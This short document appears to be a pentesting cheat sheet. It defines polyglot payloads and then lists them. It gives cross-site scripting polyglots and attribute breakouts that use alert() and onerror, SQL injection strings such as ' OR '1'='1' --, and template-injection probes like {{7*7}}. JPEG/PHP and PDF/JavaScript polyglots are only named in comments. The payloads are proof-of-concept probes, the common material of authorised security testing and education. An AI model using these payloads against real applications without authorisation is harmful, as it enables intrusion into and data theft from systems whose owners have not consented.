Polyglot Payload is a single payload that is valid in multiple contexts or formats, allowing it to trigger vulnerabilities regardless of how the application processes or renders the input.
# Works in multiple HTML contexts
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
# Breaks out of various attribute contexts
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
# Comprehensive polyglot
'";!--"<XSS>=&{()}
# Works with various string delimiters
'-"#*/
# Comprehensive SQLi polyglot
'/**/OR/**/1=1/**/--/**/
# DBMS-agnostic
' OR '1'='1' --
' OR '1'='1' /*
# JPEG/PHP polyglot (GIFAR-style)
# Valid image that's also valid PHP when included
# PDF/JavaScript polyglot
# Valid PDF containing executable JS
# Tests multiple template engines
${{<%[%'"}}%\
{{7*7}}${7*7}<%=7*7%>#{7*7}